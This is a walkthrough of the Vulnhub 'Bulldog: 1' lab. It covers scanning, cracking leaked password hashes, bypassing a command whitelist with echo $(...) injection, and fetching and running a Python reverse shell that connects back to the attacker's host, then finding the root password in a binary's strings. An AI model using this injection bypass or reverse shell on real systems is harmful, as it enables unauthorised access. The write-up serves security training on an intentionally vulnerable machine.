Vulnhub.com - Bulldog: 1
Welcome back to another challenge, which is Bulldog machine from Vulnhub.
Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don't you find out? :)
This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!
Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That's my only hint ;)
Made by Nick Frichette (frichetten.com) Twitter: @frichette_n
I'd highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn't have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.- Author: Nick Frichette
- Download: https://www.vulnhub.com/entry/bulldog-1,211/
Solution
Start the scan with nmap.
[email protected]:~# nmap -sC -sV -sS -A -v 10.0.0.19
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-30 03:34 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Initiating ARP Ping Scan at 03:34
Scanning 10.0.0.19 [1 port]
Completed ARP Ping Scan at 03:34, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:34
Completed Parallel DNS resolution of 1 host. at 03:34, 0.00s elapsed
Initiating SYN Stealth Scan at 03:34
Scanning 10.0.0.19 [1000 ports]
Discovered open port 23/tcp on 10.0.0.19
Discovered open port 8080/tcp on 10.0.0.19
Discovered open port 80/tcp on 10.0.0.19
Completed SYN Stealth Scan at 03:34, 1.15s elapsed (1000 total ports)
Initiating Service scan at 03:34
Scanning 3 services on 10.0.0.19
Completed Service scan at 03:34, 6.09s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.0.0.19
NSE: Script scanning 10.0.0.19.
Initiating NSE at 03:34
Completed NSE at 03:34, 7.12s elapsed
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Nmap scan report for 10.0.0.19
Host is up (0.00043s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.048 days (since Tue Feb 13 01:26:08 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 10.0.0.19
NSE: Script Post-scanning.
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.05 seconds
Raw packets sent: 1024 (45.850KB) | Rcvd: 1016 (41.334KB)As we can see, there are three open ports, two http running on ports 80 and 8080 and ssh running on port 23.
Let’s start by enumerating the web service on port 80.
[email protected]:~# curl 10.0.0.19
<!DOCTYPE html>
<html lang="en">
<head>
<title>Bulldog Industries</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/static/css/bootstrap.css">
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.js"></script>
</head>
<body style="background-color:grey">
<div class="container">
<h1><a href="/" style="color:white" >Bulldog Industries</a></h1>
<div class="card panel-default" style="padding:1em">
<div class="card-block">
<p><font size="4em">Thank you for visiting Bulldog Industries' website, the world's number
one purveyor of high quality English Bulldog photography! Unfortunately we are
suspending business operations until further notice. On the first of this month,
we were made aware of a breach of our technology systems. We are currently
assessing the possibility that hackers may have gotten access to customer
payment information. Do not be alarmed as we will be providing simple credit
monitoring for all affected customers.<br><br>For more information on this, please
see our public disclosure notice found below.</font></p>
<p><font size="6em"><center><a href="/notice" style="color:blue">Public Notice</a></center></font></p>
<center><img style="max-width:100%" src="/static/bulldog.jpg"/></center>
</div>
</div>
</div>
</body>
</html>
[email protected]:~# curl 10.0.0.19/dev/
<!DOCTYPE html>
<html lang="en">
<head>
<title>UNDER DEVELOPMENT</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/static/css/bootstrap.css">
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.js"></script>
</head>
<body style="background-color:#2c74e8">
<div class="container">
<h1><center><a href="/" style="color:white" >UNDER DEVELOPMENT</a></center></h1>
<div class="card panel-default" style="padding:1em">
<div class="card-block">
<p><font size="4em">If you're reading this you're likely a contractor working for
Bulldog Industries. Congratulations! I'm your new boss, Team Lead: Alan Brooke. The CEO
has literally fired the entire dev team and staff. As a result, we need to hire a bunch of people
very quickly. I'm going to try and give
you a crash course on Bulldog Industries website.<br><br>
<b>How did the previous website get attacked?</b><br><br>
An APT exploited a vulnerability in the webserver which gave them a low-privilege shell.
From there they exploited dirty cow to get root on the box. After that, the entire system
was taken over and they defaced the website. We are still transitioning from the old system to the
new one. In the mean time we are using some files which may be corrupted from the original
system. We haven't had a chance to make sure there were no lingering traces of the hack so if you find
any, send me an email.<br><br>
<b>How are we preventing future breaches?</b><br><br>
At the request of Mr. Churchy, we are removing PHP entirely from the new server. Additionally
we will not be using PHPMyAdmin or any other popular CMS system. We have been tasked with creating
our own.<br><br>
<b>Design of new system?</b><br><br>
The new website will be written entirely in Django (Mr. Churchy requested "high-end tech hipster stuff").
As of right now, SSH is enabled on the system. This will be turned off soon as we will transition
to using Web-Shell, a proprietary shell interface. This tool is explained at the link below. Additionally,
be aware that we will start using MongoDB, however we haven't fully installed that yet.<br><br>
Also be aware that we will be implementing a revolutionary AV system that is being custom made for us by
a vendor. It touts being able to run every minute to detect intrusion and hacking. Once that's up and running
we will install it on the system.
<p><font size="6em"><center><a href="/dev/shell" style="color:blue">Web-Shell</a></center></font></p>
<b>Who do I talk to to get started?</b><br><br>
<!--Need these password hashes for testing. Django's default is too complex-->
<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
Team Lead: [email protected]<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
Back-up Team Lead: [email protected]<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
Front End: [email protected]<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
Front End: [email protected]<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
Back End: [email protected]<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
Back End: [email protected]<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
Database: [email protected]<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
</font></p>
</div>
</div>
</div>
</body>
</html>Great, at the bottom of the source code we have hashes commented out. Pasting them into the Crackstation gave us this results.
6515229daf8dbdc8b89fed2e60f107433da5f2cb Unknown Not found.
38882f3b81f8f2bc47d9f3119155b05f954892fb Unknown Not found.
c6f7e34d5d08ba4a40dd5627508ccb55b425e279 Unknown Not found.
0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 Unknown Not found.
553d917a396414ab99785694afd51df3a8a8a3e0 Unknown Not found.
ddf45997a7e18a25ad5f5cf222da64814dd060d5 sha1 bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e sha1 bulldogloverSo our cracked credentials are as follow.
nick:bulldog
sarah:bulldogloverBut unluckily, none of these work on ssh. From there, I decided to run a brute force attack against directories with dirb.
[email protected]:~# dirb http://10.0.0.19
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 30 04:50:34 2018
URL_BASE: http://10.0.0.19/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.0.19/ ----
==> DIRECTORY: http://10.0.0.19/admin/
==> DIRECTORY: http://10.0.0.19/dev/
+ http://10.0.0.19/robots.txt (CODE:200|SIZE:1071)
---- Entering directory: http://10.0.0.19/admin/ ----
==> DIRECTORY: http://10.0.0.19/admin/auth/
==> DIRECTORY: http://10.0.0.19/admin/login/
==> DIRECTORY: http://10.0.0.19/admin/logout/
---- Entering directory: http://10.0.0.19/dev/ ----
==> DIRECTORY: http://10.0.0.19/dev/shell/
---- Entering directory: http://10.0.0.19/admin/auth/ ----
==> DIRECTORY: http://10.0.0.19/admin/auth/group/
==> DIRECTORY: http://10.0.0.19/admin/auth/user/
---- Entering directory: http://10.0.0.19/admin/login/ ----
---- Entering directory: http://10.0.0.19/admin/logout/ ----
---- Entering directory: http://10.0.0.19/dev/shell/ ----
---- Entering directory: http://10.0.0.19/admin/auth/group/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
---- Entering directory: http://10.0.0.19/admin/auth/user/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
-----------------
END_TIME: Thu Aug 30 04:53:01 2018
DOWNLOADED: 32284 - FOUND: 1Directory named admin? Seems interesting, let’s try that.
We can authenticate straight away with previously gathered credentials, but there is nothing in the service so I decided to move on and go to the /dev/shell web page. It’s essential that you’re logged into the admin as the shell won’t grant you the access.
Before anything, I decided to check other pages found by dirb.
[email protected]:~# curl http://10.0.0.19/robots.txt
________ _________.__ .__ .___
/ _____/ ___________ _____ _____ ____ / _____/| |__ ____ ______ | |__ ___________ __| _/
/ \ ____/ __ \_ __ \/ \\__ \ / \ \_____ \ | | \_/ __ \\____ \| | \_/ __ \_ __ \/ __ |
\ \_\ \ ___/| | \/ Y Y \/ __ \| | \ / \| Y \ ___/| |_> > Y \ ___/| | \/ /_/ |
\______ /\___ >__| |__|_| (____ /___| / /_______ /|___| /\___ > __/|___| /\___ >__| \____ |
\/ \/ \/ \/ \/ \/ \/ \/|__| \/ \/ \/
___ ___ __ ___________
/ | \_____ ____ | | __ \__ ___/___ _____ _____
/ ~ \__ \ _/ ___\| |/ / | |_/ __ \\__ \ / \
\ Y // __ \\ \___| < | |\ ___/ / __ \| Y Y \
\___|_ /(____ /\___ >__|_ \ |____| \___ >____ /__|_| /
\/ \/ \/ \/ \/ \/ \/
You got owned[email protected]:~# curl http://10.0.0.19/notice/
<!DOCTYPE html>
<html lang="en">
<head>
<title>Bulldog Industries</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/static/css/bootstrap.css">
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.js"></script>
</head>
<body style="background-color:grey">
<div class="container">
<h1><a href="/" style="color:white" >Bulldog Industries</a></h1>
<div class="card panel-default" style="padding:1em">
<div class="card-block">
<p><font size="4em">To our valued customers,<br><br>On the first of this month our
technical analysts discovered a breach of our payment card systems. I don’t know
how these hackers did it. Our technical folk are telling me something about a clam
shell and a smelly cow? I'm not sure about all of that.<br><br>
To prove Bulldog Industries’ commitment to our customers I fired all of our existing
technical staff. All of them! We are going to restart from the ground up! No more
excuses! Our tech guys will have to make due with what they’ve got. We even
increased their budget 1%! <br><br>You gotta see the neck beards on the new guys!
Real tech hipsters. Zuckerberg types. They know their stuff, security wont be a
problem from now on!<br><br>
I'd like to remind our valued customers that we will be providing basic credit
monitoring services as a result of this breach (if you’ve made a purchase of $100
or more).<br><br>
Your true friend,<br><br>Winston Churchy (CEO)</font></p>
</div>
</div>
</div>
</body>
</html>But not much of a clue there. Let’s poke into the system with shell as much as we can.
Command : ls -la
total 56
drwxrwxr-x 3 django django 4096 Aug 30 09:14 .
drwxr-xr-x 5 django django 4096 Sep 21 2017 ..
drwxrwxr-x 4 django django 4096 Aug 24 2017 bulldog
-rwxr-xrwx 1 django django 40960 Aug 30 09:14 db.sqlite3
-rwxr-xr-x 1 django django 250 Aug 16 2017 manage.py
Command : cat manage.py
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bulldog.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
Command : ./manage.py test
INVALID COMMAND. I CAUGHT YOU HACKER!
Command : ls -la bulldog
total 52
drwxrwxr-x 4 django django 4096 Aug 24 2017 .
drwxrwxr-x 3 django django 4096 Aug 30 09:14 ..
-rw-r--r-- 1 django django 0 Aug 16 2017 __init__.py
-rw-r--r-- 1 django django 138 Aug 16 2017 __init__.pyc
-rw-r--r-- 1 django django 2762 Aug 24 2017 settings.py
-rw-r--r-- 1 django django 2971 Aug 24 2017 settings.pyc
drwxrwxr-x 4 django django 4096 Aug 24 2017 static
drwxrwxr-x 2 django django 4096 Sep 21 2017 templates
-rw-r--r-- 1 django django 1154 Aug 18 2017 urls.py
-rw-r--r-- 1 django django 1477 Aug 24 2017 urls.pyc
-rw-rw-r-- 1 django django 995 Aug 19 2017 views.py
-rw-rw-r-- 1 django django 1927 Aug 19 2017 views.pyc
-rw-r--r-- 1 django django 391 Aug 16 2017 wsgi.py
-rw-r--r-- 1 django django 595 Aug 16 2017 wsgi.pycIn addition, we can reveal the source code of the shell.
Command : cat bulldog/views.py
from django.shortcuts import render
import subprocess
commands = ['ifconfig','ls','echo','pwd','cat','rm']
def homepage(request):
return render(request, 'index.html')
def notice(request):
return render(request, 'notice.html')
def dev(request):
return render(request, 'dev.html')
def shell(request):
if request.method == "POST":
command = request.POST.get("command", None)
to_return = "Command : " + command + "\n\n"
if validate(command):
execute = subprocess.check_output(command, shell=True)
to_return += execute
elif ";" in command:
to_return += "INVALID COMMAND. I CAUGHT YOU HACKER! ';' CAN BE USED TO EXECUTE MULTIPLE COMMANDS!!"
else:
to_return += "INVALID COMMAND. I CAUGHT YOU HACKER!"
context = {'data': to_return}
return render(request, 'shell.html', context)
return render(request, 'shell.html')
def validate(command):
if any(com in command for com in commands) and ";" not in command:
return True
return FalseBack to the shell. After many tries, I found out that you can execute commands with echo using echo $(COMMAND) syntax.
Command : echo $(which nc)
/bin/ncUnfortunately, simple reverse shell with netcat does not work.
My next step was python reverse shell, but we cannot enter ; characters into the command, application will detect it and stop us. Simple way to bypass that is to paste the reverse shell into the file on our host machine, set up a SimpleHTTPServer and use wget to get the file.
[email protected]:~# cat reverse.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);Now we can wget the file using the shell.
Command : echo $(wget 10.0.0.4:8000/reverse.py)
Command : ls
bulldog
db.sqlite3
manage.py
reverse.pyBy running it, we get that sweet unrestricted shell.
echo $(python reverse.py)
[email protected]:~# nc -lvp 1337
listening on [any] 1337 ...
10.0.0.19: inverse host lookup failed: Unknown host
connect to [10.0.0.4] from (UNKNOWN) [10.0.0.19] 44172
/bin/sh: 0: can't access tty; job control turned off
$ whoami
djangoNow let’s find something that will allow us to escalate privilages into the root.
[email protected]:/home/django/bulldog$ cd /home
cd /home
[email protected]:/home$ ls -la
ls -la
total 16
drwxr-xr-x 4 root root 4096 Aug 24 2017 .
drwxr-xr-x 24 root root 4096 Aug 26 2017 ..
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21 2017 bulldogadmin
drwxr-xr-x 5 django django 4096 Sep 21 2017 django
[email protected]:/home$ cd bulldogadmin
cd bulldogadmin
[email protected]:/home/bulldogadmin$ ls -la
ls -la
total 40
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21 2017 .
drwxr-xr-x 4 root root 4096 Aug 24 2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 220 Aug 24 2017 .bash_logout
-rw-r--r-- 1 bulldogadmin bulldogadmin 3771 Aug 24 2017 .bashrc
drwx------ 2 bulldogadmin bulldogadmin 4096 Aug 24 2017 .cache
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 2017 .hiddenadmindirectory
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Aug 25 2017 .nano
-rw-r--r-- 1 bulldogadmin bulldogadmin 655 Aug 24 2017 .profile
-rw-rw-r-- 1 bulldogadmin bulldogadmin 66 Aug 25 2017 .selected_editor
-rw-r--r-- 1 bulldogadmin bulldogadmin 0 Aug 24 2017 .sudo_as_admin_successful
-rw-rw-r-- 1 bulldogadmin bulldogadmin 217 Aug 24 2017 .wget-hsts
[email protected]:/home/bulldogadmin$ cd .hiddenadmindirectory
cd .hiddenadmindirectory
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ ls -la
ls -la
total 24
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 2017 .
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21 2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26 2017 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin 619 Sep 21 2017 note
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ cat note
cat note
Nick,
I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!
It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?
Let me know what you think of it!
-AshleySo it seems we have a binary to reverse engineer. Firstly, I’ll start SimpleHTTPServer to copy it into my Kali machine.
Then we can use radare to try and crack it.
<gadmin/.hiddenadmindirectory$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.0.0.4 - - [30/Aug/2018 15:21:51] "GET /customPermissionApp HTTP/1.1" 200 -[email protected]:~/vulnhub/bulldog# wget 10.0.0.19:8000/customPermissionApp
--2018-08-30 11:21:51-- http://10.0.0.19:8000/customPermissionApp
Connecting to 10.0.0.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8728 (8.5K) [application/octet-stream]
Saving to: ‘customPermissionApp’
customPermissionApp 100%[===================>] 8.52K --.-KB/s in 0s
2018-08-30 11:21:51 (43.8 MB/s) - ‘customPermissionApp’ saved [8728/8728]
[email protected]:~/vulnhub/bulldog# r2 customPermissionApp
[0x004004e0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[0x004005d6]> izz
000 0x00000034 0x00400034 4 10 (LOAD0) utf16le @8\[email protected]
001 0x00000238 0x00400238 27 28 (.interp) ascii /lib64/ld-linux-x86-64.so.2
002 0x00000286 0x00400286 6 7 (.note.gnu.build_id) ascii 32S0-t
003 0x00000349 0x00400349 9 10 (.dynstr) ascii libc.so.6
004 0x00000353 0x00400353 4 5 (.dynstr) ascii puts
005 0x00000358 0x00400358 16 17 (.dynstr) ascii __stack_chk_fail
006 0x00000369 0x00400369 6 7 (.dynstr) ascii system
007 0x00000370 0x00400370 17 18 (.dynstr) ascii __libc_start_main
008 0x00000382 0x00400382 14 15 (.dynstr) ascii __gmon_start__
009 0x00000391 0x00400391 9 10 (.dynstr) ascii GLIBC_2.4
010 0x0000039b 0x0040039b 11 12 (.dynstr) ascii GLIBC_2.2.5
011 0x000004a1 0x004004a1 4 5 (.plt) ascii %z\v
012 0x000004b1 0x004004b1 4 5 (.plt) ascii %r\v
013 0x000004c1 0x004004c1 4 5 (.plt) ascii %j\v
014 0x000004d1 0x004004d1 4 5 (.plt.got) ascii %"\v
015 0x00000515 0x00400515 4 5 (.text) ascii UH-H
016 0x000005eb 0x004005eb 5 7 (.text) utf8 1?\b\[email protected]
-->017 0x0000060d 0x0040060d 9 10 (.text) ascii SUPERultH
018 0x0000061b 0x0040061b 9 10 (.text) ascii imatePASH
019 0x00000629 0x00400629 9 10 (.text) ascii SWORDyouH
020 0x00000637 0x00400637 7 8 (.text) ascii CANTget
021 0x00000669 0x00400669 6 7 (.text) ascii dH34%(
022 0x00000680 0x00400680 5 6 (.text) ascii AWAVA
023 0x00000687 0x00400687 5 6 (.text) ascii AUATL
024 0x0000068d 0x0040068d 4 5 (.text) ascii %~\a
025 0x00000695 0x00400695 4 5 (.text) ascii -~\a
026 0x000006d9 0x004006d9 14 16 (.text) utf8 \b[]A\A]A^A_Ðf. blocks=Basic Latin,Latin-1 Supplement
027 0x00000708 0x00400708 52 53 (.rodata) ascii Please enter a valid username to use root privileges
028 0x00000740 0x00400740 40 41 (.rodata) ascii \tUsage: ./customPermissionApp <username>
-->029 0x00000769 0x00400769 12 13 (.rodata) ascii sudo su root
030 0x000007c0 0x004007c0 4 5 (.eh_frame) ascii \e\f\a\b
031 0x000007f0 0x004007f0 4 5 (.eh_frame) ascii \e\f\a\b
032 0x00000817 0x00400817 5 6 (.eh_frame) ascii ;*3$"
033 0x00001048 0x00000000 51 52 (.comment) ascii GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609Hey, we don’t even have to reverse engineer that! Looking for strings we can see sudo su root, and the string that seems to be a password to the root account.
Is it SUPERultiHmatePASHSWORDyouHCANTget? Nope, but after few different tries, getting rid of this ood H letters got me lucky.
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ sudo su root
sudo su root
[sudo] password for django: SUPERultHimatePASHSWORDyouHCANTget
Sorry, try again.
[sudo] password for django:
Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTgetNow we can get the flag.
[email protected]:/home/bulldogadmin/.hiddenadmindirectory# cd /root
cd /root
[email protected]:~# ls -la
ls -la
total 36
drwx------ 3 root root 4096 Sep 21 2017 .
drwxr-xr-x 24 root root 4096 Aug 26 2017 ..
-rw------- 1 root root 378 Sep 21 2017 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 288 Sep 21 2017 congrats.txt
drwxr-xr-x 2 root root 4096 Aug 24 2017 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Aug 24 2017 .selected_editor
-rw------- 1 root root 1065 Sep 21 2017 .viminfo
[email protected]:~# cat congrats.txt
cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?
Let me know what you thought on twitter, I'm @frichette_n
As far as I know there are two ways to get root. Can you find the other one?
Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!